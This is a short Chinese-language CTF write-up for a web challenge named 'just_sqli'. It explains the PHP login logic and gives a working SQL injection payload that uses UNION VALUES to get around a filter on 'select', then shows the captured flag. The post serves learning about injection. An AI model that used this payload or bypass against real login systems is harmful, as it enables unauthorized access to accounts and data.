just_sqli

margin 2023-10-14 13:49:48 1016 0


可以先分析源代码:

<?php if ($user) { ?>
开始一个PHP代码块,如果变量$user存在(表示用户已登录),则执行下面的内容。
<?php if ($is_admin) { ?>
<div> <?= include("../flag.php"); ?></div>

如果变量$is_admin存在且为真(表示用户具有管理员权限),则执行下面的内容。
将../flag.php文件的内容包含在一个区域中并显示出来


而且php代码中提示

throw new Exception("only select is a forbidden word");

所以select 无法使用

构造payload

username=1&password=1' UNION VALUES ('1', true) --

即可成功获取flag

KosenCTF{d0_y0u_kn0w_that_the_w0rd_va1u35_can_b3_aft3r_un10n}
分类:WEB
image
作者:margin

1

提交

0

收入

相关WriteUP

  • sqli-0x1 Writeup

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • [HackINI-2022] lfi WriteUp

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • just-work-type

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
  • Fetus Web

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 8月前
  • post-the-get

    ***收费WriteUP请购买后查看,VIP用户可免费查看***

    • WEB
    • 1年前
问题反馈